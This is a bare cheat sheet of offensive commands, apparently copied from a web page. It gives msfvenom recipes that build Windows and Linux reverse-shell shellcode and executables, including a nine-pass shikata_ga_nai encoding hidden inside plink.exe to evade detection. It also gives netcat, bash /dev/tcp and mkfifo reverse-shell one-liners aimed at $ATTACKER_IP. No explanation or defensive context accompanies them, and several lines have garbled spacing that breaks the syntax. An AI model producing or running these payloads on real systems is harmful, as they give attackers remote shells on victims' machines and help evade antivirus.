Copy msfvenom -a x86 --platform Windows \
-p windows/shell_reverse_tcp \
-b '\x00\x40\x0a\x0d' \
-f python -v shellcode \
LHOST= $ATTACKER_IP LPORT= $ATTACKER_PORT
Copy msfvenom - p windows / shell_reverse_tcp - f exe \
- e x86 / shikata_ga_nai - i 9 \
- x / usr / share / windows - binaries / plink . exe - o reverse . exe \
LHOST = $ATTACKER_IP LPORT = $ATTACKER_PORT
Copy msfvenom -a x86 --platform windows \
-p windows/shell_reverse_tcp \
-b '\x00\x40\x0a\x0d' \
-s $PAYLOAD_SIZE \
LHOST= $ATTACKER_IP LPORT= $ATTACKER_PORT \
| msfvenom -a x86 --platform Windows -f python -v shellcode
Copy msfvenom - a x86 --platform Windows \
- p linux / x86 / shell_reverse_tcp \
- b '\x00\x40\x0a\x0d' \
- f python - v shellcode \
LHOST = $ATTACKER_IP LPORT = $ATTACKER_PORT
Copy nc $ATTACKER_IP 443 - e / bin / bash
Copy / bin / bash - i >& / dev / tcp / $ATTACKER_IP / $ATTACKER_PORT 0 >& 1
Copy rm / tmp / f;mkfifo / tmp / f;cat / tmp / f |/ bin / sh - i 2 >& 1 | nc $ATTACKER_IP $ATTACKER_PORT >/ tmp / f